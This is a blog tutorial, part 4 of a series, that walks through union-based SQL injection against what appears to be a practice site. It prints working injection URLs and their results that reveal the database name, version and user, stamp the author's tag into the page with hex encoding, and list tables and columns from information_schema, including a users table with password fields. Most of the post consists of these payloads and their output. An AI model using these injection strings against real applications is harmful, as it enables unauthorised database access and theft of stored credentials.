Monday, May 4, 2015

How To Print ur Leet name , Database , Version ,user ,tables and columns with coloring part 4


Today we will learn How To print Database , name , Version And many More Functions and variables..::

Lets Go ::~~

As we Soved this Site in Previous tutorial ..
So we know that it has 3 columns and column number is vulnerable ..

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,2,3--+

















------------------------------------------------------------------------------------------------------------------------
Now if We want know  database name then we type database() at place of 2..

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,database(),3--+

Username is : leettime_761wHole (it is databasename)
-------------------------------------------------------------------------------------------------------


Now if want To know Version of this site the we type Version()



http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,version(),3--+
Result ::
5.5.42-cll

------------------------------------------------------------------------------------------------------
Now If we want to know it is user name then we type user() at place of 2..
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,user(),3--+
Result::leettime_W89sst1@localhost 
-------------------------------------------------------------------------------------------------------------------
Now Going To Print Our Name ..
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,~~inject by Afghani~~,3--+

It gives Error :----

Error While Selection process : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'by Afghani~~,3-- '' at line 1



Print values in sqli




 --------------------------------------------------------------------------------------------
Now if  i Convert  Into string and also into Hexa It Print My Name ...

In String::~~ By Putting single code 'Our name here Goes'
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,'~~inject by Afghani~~',3--+


 By Converting Into Hexa..Convert inot Hexa and then Mulitple with 0 ..Like that..

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,0x7e7e696e6a6563742062792041666768616e697e7e,3--+
Result::~~
~~inject by Afghani~~
--------------------------------------------------------------------------------

How can we Print multiple varisbles and function as at once
----------------------------------------------------------------------------

By Using Concat , Group_concat , Make_set , export_set 
Concat_ws We can Print multliple Values at once..


http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,Concat('~~inject by Afghani~~',database(),user(),version()),3--+

Result:::
~~inject by Afghani~~leettime_761wHoleleettime_W89sst1@localhost5.5.42-cll

So we want print it seprate seprate . So we use <br> means break the  line ...
<br> into hexa = 
0x3c62723e

So our query look like ::
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,Concat(0x3c62723e,'~~inject by Afghani~~',0x3c62723e,database(),0x3c62723e,user(),0x3c62723e,version()),3--+

Result::

~~inject by Afghani~~
leettime_761wHole
leettime_W89sst1@localhost
5.5.42-cll

Now i am going to Show tables and columns..

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,Concat(0x3c62723e,'~~inject by Afghani~~',0x3c62723e,database(),0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,table_name,0x3a3a3a,column_name),3 from information_schema.columns where table_schema=database()--+ 

Result ::



Username is :
~~inject by Afghani~~
leettime_761wHole
leettime_W89sst1@localhost
5.5.42-cll
testtable1:::testid
Username is :
~~inject by Afghani~~
leettime_761wHole
leettime_W89sst1@localhost
5.5.42-cll
testtable1:::column1
Username is :
~~inject by Afghani~~
leettime_761wHole
leettime_W89sst1@localhost
5.5.42-cll
testtable1:::column2
Username is :
~~inject by Afghani~~
leettime_761wHole
leettime_W89sst1@localhost
5.5.42-cll
testtable1:::column3
Username is :
~~inject by Afghani~~
leettime_761wHole
leettime_W89sst1@localhost
5.5.42-cll
userlogs:::id
Username is :
~~inject by Afghani~~
leettime_761wHole
leettime_W89sst1@localhost
5.5.42-cll
userlogs:::username
Username is :
~~inject by Afghani~~
leettime_761wHole
leettime_W89sst1@localhost
5.5.42-cll
userlogs:::action
Username is :
~~inject by Afghani~~
leettime_761wHole
leettime_W89sst1@localhost
5.5.42-cll
userlogs:::date
Username is :
~~inject by Afghani~~
leettime_761wHole
leettime_W89sst1@localhost
5.5.42-cll
users:::id
Username is :
~~inject by Afghani~~
leettime_761wHole
leettime_W89sst1@localhost
5.5.42-cll
users:::username
Username is :
~~inject by Afghani~~
leettime_761wHole
leettime_W89sst1@localhost
5.5.42-cll
users:::password
Username is :
~~inject by Afghani~~
leettime_761wHole
leettime_W89sst1@localhost
5.5.42-cll
users:::user_type
Username is :
~~inject by Afghani~~
leettime_761wHole
leettime_W89sst1@localhost
5.5.42-cll
users:::sec_code



I hope u Got it something ::

Author (Afghani):::~~~

No comments:

Post a Comment